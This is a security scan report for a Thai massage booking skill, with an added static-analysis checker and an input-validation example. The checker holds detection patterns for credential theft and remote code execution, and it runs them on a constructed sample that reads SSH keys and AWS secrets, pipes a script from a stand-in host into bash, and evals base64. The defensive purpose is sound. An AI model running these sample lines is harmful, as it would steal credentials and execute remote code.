Trusted · Risk score 5/100
Last scan: 2 days ago
蘭泰式按摩预约 (Lann Thai massage booking)
Booking service for 蘭泰式按摩 (Lann Thai massage): store lookup, service lookup, and booking creation.
A legitimate Thai massage (蘭泰式按摩) booking skill with clean, straightforward code. No shell execution, no credential access, no sensitive path traversal, and no data exfiltration. The only external network call is a documented POST to the booking API.
Skill name: 蘭泰式按摩预约
Analysis time: 32.2 s
Engine: pi
Verdict: installable
This skill is safe to use. No action required.
Resource | Declared permission | Inferred permission | Status | Evidence
Filesystem | READ | READ | ✓ consistent | index.js:5: fs.readFileSync reads org_store.json and prod_service.json
Network | READ | WRITE | ✓ consistent | index.js:96: fetch POST to https://open.lannlife.com/mcp/book/create
Command execution | NONE | NONE | | No child_process, exec, spawn, or eval calls found
Environment variables | NONE | NONE | | No os.environ or process.env access found
Skill invocation | NONE | NONE | | No recursive skill invocation
Clipboard | NONE | NONE | | No clipboard access
Browser | NONE | NONE | | No browser automation
Database | NONE | NONE | | No database access

Note on the Network row: the declared permission is READ, but the inferred permission is WRITE, because the POST at index.js:96 creates a booking. The scanner still marks the row consistent; read the declaration as understating what the code does.
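A first-pass static check of the kind the table above summarizes, as an added example written for this page (it is not the scanning engine's code). It greps constructed sample sources for the same indicators the evidence column cites (child_process, exec/spawn, eval, process.env, credential paths, base64 decoding, curl|bash, fetch, readFileSync) and reports file:line evidence in the table's format. The rule set, the category names, the declared-permission list and both sample sources are this example's own constructions.

```javascript
'use strict';

// Added example: a grep-style permission check in the spirit of the report's
// evidence column. Rules, category names and sample sources are this example's
// own constructions, not the scanning engine's rule set.
const RULES = [
  { category: 'command_execution',
    re: /require\(\s*['"](?:node:)?child_process['"]\s*\)|\b(?:exec|execSync|execFile|spawn|spawnSync)\s*\(|\beval\s*\(|new\s+Function\s*\(/ },
  { category: 'env_access', re: /\bprocess\.env\b/ },
  // string literals that name ~/.ssh, ~/.aws or a .env file
  { category: 'credential_paths',
    re: /['"`][^'"`\n]*\.(?:ssh|aws)\b[^'"`\n]*['"`]|['"`](?:[^'"`\n]*\/)?\.env['"`]/ },
  { category: 'decode_tricks', re: /\batob\s*\(|Buffer\.from\([^)\n]*['"]base64['"]\s*\)/ },
  { category: 'remote_code_exec', re: /\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b/ },
  { category: 'network', re: /\bfetch\s*\(|https?:\/\/[^\s'"`]+/ },
  { category: 'filesystem_read', re: /\b(?:fs\.)?(?:readFileSync|readFile)\s*\(/ },
];

// Permissions the skill declares (assumption: filesystem READ and network access).
const DECLARED = new Set(['filesystem_read', 'network']);

// Scan one source file. Returns { category: ['file:line: code', ...] }, one
// entry per matching line, mirroring the report's evidence format.
function scanSource(filename, source) {
  const findings = {};
  source.split('\n').forEach((line, idx) => {
    for (const rule of RULES) {
      if (rule.re.test(line)) {
        if (!findings[rule.category]) findings[rule.category] = [];
        findings[rule.category].push(`${filename}:${idx + 1}: ${line.trim()}`);
      }
    }
  });
  return findings;
}

// Categories observed in the code but absent from the declaration.
function undeclared(findings) {
  return Object.keys(findings).filter((c) => !DECLARED.has(c)).sort();
}

// Constructed sample resembling what the report describes for index.js.
const CLEAN_SAMPLE = [
  "const fs = require('fs');",
  "const path = require('path');",
  "const stores = JSON.parse(fs.readFileSync(path.join(__dirname, 'org_store.json'), 'utf8'));",
  'async function createBooking(body) {',
  "  const res = await fetch('https://open.lannlife.com/mcp/book/create', { method: 'POST', body: JSON.stringify(body) });",
  '  return res.json();',
  '}',
].join('\n');

// Constructed sample containing the patterns the report says are absent.
const SUSPICIOUS_SAMPLE = [
  "const cp = require('child_process');",
  'const token = process.env.AWS_SECRET_ACCESS_KEY;',
  "const key = require('fs').readFileSync(process.env.HOME + '/.ssh/id_rsa', 'utf8');",
  "cp.execSync('curl -s https://example.invalid/x.sh | bash');",
  "eval(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString());",
].join('\n');

const cleanFindings = scanSource('index.js', CLEAN_SAMPLE);
console.log('clean sample, undeclared:', undeclared(cleanFindings), cleanFindings);
const badFindings = scanSource('evil.js', SUSPICIOUS_SAMPLE);
console.log('suspicious sample, undeclared:', undeclared(badFindings), badFindings);
```

A token scan like this is only a first pass: `require('child_' + 'process')`, a dynamic `import()`, or `global['ev' + 'al']` carries none of the tokens above. That is why a report of this kind separately records that no base64/decode tricks or obfuscated code are present; a hit on the decode rules is a reason to read the file by hand, not a finding to score on its own.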
1 finding
Medium · External URL
https://open.lannlife.com/mcp/book/create (SKILL.md:49)

Directory structure

6 files · 44.6 KB · 1266 lines
JSON: 3 files · 574 lines; JavaScript: 2 files · 525 lines; Markdown: 1 file · 167 lines
├─ _meta.json  JSON, 4 lines, 102 B
├─ index.js  JavaScript, 437 lines, 12.0 KB
├─ org_store.json  JSON, 457 lines, 16.8 KB
├─ prod_service.json  JSON, 113 lines, 6.8 KB
├─ SKILL.md  Markdown, 167 lines, 5.8 KB
└─ test.js  JavaScript, 88 lines, 3.1 KB

Dependency analysis (3 items)

Package | Version | Source | Known vulnerabilities | Notes
fs | built-in | Node.js core | none listed | Only reads static JSON files
path | built-in | Node.js core | none listed | Path resolution only
fetch | built-in | Node.js / Web API | none listed | Standard HTTP POST to documented endpoint

Security highlights

✓ No shell execution (child_process, exec, spawn, eval) — code is purely JavaScript logic
✓ No credential harvesting — no access to ~/.ssh, ~/.aws, .env, or environment variables
✓ No sensitive path traversal — only reads two specific local JSON files in __dirname
✓ No base64/decode tricks — no obfuscated code or hidden payloads
✓ No remote code execution patterns — curl|bash, wget|sh, or eval(atob(...)) not present
✓ No data exfiltration — only POSTs booking data (mobile, store, service) to one documented API endpoint
✓ Input validation is comprehensive: phone number format, people count (1-20), ISO 8601 time, required string checks
✓ Fuzzy ("smart") matching resolves near-miss store and service names to known entries; this is input robustness rather than a defence against typosquatting, which concerns attacker-registered look-alike names
✓ Dependencies: only Node.js built-in modules (fs, path) — no external npm packages with untracked vulnerabilities
✓ Full test suite in test.js for all major functions
✓ SKILL.md accurately documents all three capabilities and the external API endpoint
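The validation the highlights describe (phone number format, people count 1-20, ISO 8601 time, required string checks), as an added example written for this page rather than the skill's own index.js. The field names (mobile, store, service, people, time), the mainland-China mobile pattern, the 64-character cap on names and the allowlisted payload are assumptions about the skill's input contract; the request to the documented endpoint is built but not sent, so the block runs offline.

```javascript
'use strict';

// Added example, not the skill's index.js. Field names, the mobile-number
// pattern and the length cap are assumptions about the skill's input contract.
const BOOKING_ENDPOINT = 'https://open.lannlife.com/mcp/book/create'; // endpoint documented in the report
const MOBILE_RE = /^1[3-9]\d{9}$/;  // assumption: 11-digit mainland China mobile number
const MAX_PEOPLE = 20;
const MAX_NAME_LEN = 64;            // assumption: cap on store/service names sent to the API

// Last day of a 1-based month, so "2025-02-30" is rejected instead of rolling into March.
function daysInMonth(year, month) {
  return new Date(Date.UTC(year, month, 0)).getUTCDate();
}

// Strict ISO 8601 date-time: explicit date, time and timezone designator, every
// field range-checked. Date.parse alone is not enough, since V8 accepts
// out-of-range days. Returns a Date or null.
function parseIso8601(s) {
  if (typeof s !== 'string') return null;
  const m = /^(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2})(?::(\d{2}))?(?:\.\d{1,3})?(?:Z|[+-]\d{2}:\d{2})$/.exec(s);
  if (!m) return null;
  const [year, month, day, hour, minute, second] =
    m.slice(1, 7).map((v) => (v === undefined ? 0 : Number(v)));
  if (month < 1 || month > 12 || day < 1 || day > daysInMonth(year, month)) return null;
  if (hour > 23 || minute > 59 || second > 59) return null;
  const t = Date.parse(s);
  return Number.isFinite(t) ? new Date(t) : null;
}

// Required, non-empty, trimmed string within the length cap; null otherwise.
function requiredString(value) {
  if (typeof value !== 'string') return null;
  const trimmed = value.trim();
  return trimmed.length > 0 && trimmed.length <= MAX_NAME_LEN ? trimmed : null;
}

// Validate one booking request. Returns { ok: true, payload } containing only
// the allowlisted fields, or { ok: false, errors } listing every failed check.
function validateBooking(input) {
  if (input === null || typeof input !== 'object') {
    return { ok: false, errors: ['input must be an object'] };
  }
  const errors = [];
  const mobile = typeof input.mobile === 'string' && MOBILE_RE.test(input.mobile) ? input.mobile : null;
  if (mobile === null) errors.push('mobile: expected an 11-digit mobile number');
  const store = requiredString(input.store);
  if (store === null) errors.push('store: required non-empty string');
  const service = requiredString(input.service);
  if (service === null) errors.push('service: required non-empty string');
  // Strict integer check: the string "5" is rejected rather than coerced.
  const people = Number.isInteger(input.people) && input.people >= 1 && input.people <= MAX_PEOPLE
    ? input.people : null;
  if (people === null) errors.push(`people: integer between 1 and ${MAX_PEOPLE}`);
  const time = parseIso8601(input.time);
  if (time === null) errors.push('time: ISO 8601 date-time with timezone, e.g. 2025-06-01T14:00:00+08:00');
  if (errors.length > 0) return { ok: false, errors };
  // Any other property on `input` is dropped here, so only these fields reach the API.
  return { ok: true, payload: { mobile, store, service, people, time: time.toISOString() } };
}

// The request the skill would send. Built, not executed, so the example runs offline.
function buildBookingRequest(payload) {
  return {
    url: BOOKING_ENDPOINT,
    method: 'POST',
    headers: { 'content-type': 'application/json' },
    body: JSON.stringify(payload),
  };
}

// Constructed sample inputs.
const sampleGood = { mobile: '13800138000', store: 'Lann Store', service: 'Thai massage 60 min',
  people: 2, time: '2025-06-01T14:00:00+08:00', extra: 'ignored' };
const sampleBad = { mobile: '12345', store: '', service: 'Thai massage', people: 21, time: '2025-02-30T10:00Z' };

const goodResult = validateBooking(sampleGood);
console.log(goodResult.ok ? buildBookingRequest(goodResult.payload) : goodResult.errors);
console.log(validateBooking(sampleBad).errors);
```

Two choices are deliberate: the time is normalised to UTC before it is serialised, so the API never sees the caller's local offset ambiguity, and the payload is rebuilt from validated locals rather than spread from the input, which is what keeps unexpected properties out of the POST body.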